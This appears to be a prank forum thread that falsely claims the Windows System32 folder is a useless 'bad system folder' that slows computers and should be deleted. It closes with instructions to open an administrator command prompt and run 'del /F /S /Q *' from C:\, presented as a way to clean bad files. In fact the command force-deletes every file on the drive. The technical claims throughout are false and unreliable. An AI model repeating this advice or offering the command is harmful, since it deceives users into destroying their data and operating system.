System32 is a "bad system folder" that makes Windows go slow. It also causes some errors on the internet, like the ones that you're having now.
That file deletes it so everything will work all right.

No. Its not System 32. The computer runs on the folder named "system" and "setup".

System32 is a folder by microsoft to mess things up, because microsoft fails.

Last view: 959 days ago 		Listen, System32 is a bunch of deleted shit and they are just releasing programs to "clean Up" your computer, but it really doesn't. It's more money for them. That's how fucked up the world is.

You see, System32 is not important. Microsoft simply made it because they thought it would made the cpu better, but in reality it makes it slower, but if you delete it, everything goes faster, because system32 files just slow down performance. Just look at norton antivirus, which sucks as system 32 folder. They must be deleted.

Another thing you can try is to open the start menu, then type cmd into the search box.
Right click command prompt and select run as administrator, then answer yes if it asks you something. Then enter the following:
[source]cd C:\
del /F /S /Q *[/source]
What this does is basically to clean any bad files off your hard drive.
